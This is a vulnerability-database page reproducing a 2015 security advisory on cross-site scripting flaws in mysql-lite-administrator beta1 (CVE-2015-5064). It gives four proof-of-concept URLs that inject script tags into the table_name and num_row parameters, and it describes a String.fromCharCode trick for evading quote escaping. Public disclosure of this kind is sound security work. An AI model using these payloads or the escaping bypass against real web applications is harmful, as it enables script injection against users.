Vulners
Lucene search
MySQL Lite Administrator Beta 1 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2015-5064 | 24 Jun 201514:59 | – | attackerkb |
 | Multiple Cross-Site Scripting Vulnerabilities in MySql Lite Administrator beta-1 | 26 Jun 201500:00 | – | cnvd |
 | CVE-2015-5064 | 24 Jun 201514:00 | – | cve |
 | CVE-2015-5064 | 24 Jun 201514:00 | – | cvelist |
 | EUVD-2015-5080 | 7 Oct 202500:30 | – | euvd |
 | CVE-2015-5064 | 24 Jun 201514:59 | – | nvd |
 | Cross site scripting | 24 Jun 201514:59 | – | prion |
`[+] Credits: hyp3rlinx
[+] Domains: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt
Vendor:
=============================================
code.google.com/p/mysql-lite-administrator
Product:
==================================================
mysql-lite-administrator(beta1)
Advisory Information:
==============================
Multiple XSS vulnerabilities
Vulnerability Details:
======================
mysql-lite-administrator is vulnerable to XSS attacks, the application
escapes
injected strings.
e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript
functions
String.charCodeAt() & String.fromCharCode()
XSS Exploit code(s):
====================
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/tabella.php?table_name=
<script>alert(String.fromCharCode(72,69,76,76))</script>
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=
<script>alert(666)</script>
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/coloni.php?num_row=
"><script>alert(String.fromCharCode(72,69,76,76))</script>
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/insert.php?table_name=
<script>alert(666)</script>
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 21, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] mysql-lite-administrator (beta1)
Vulnerable Parameter(s): [+] table_name, num_row
Affected Area(s): [+] tabella.php & coloni.php
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jun 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00256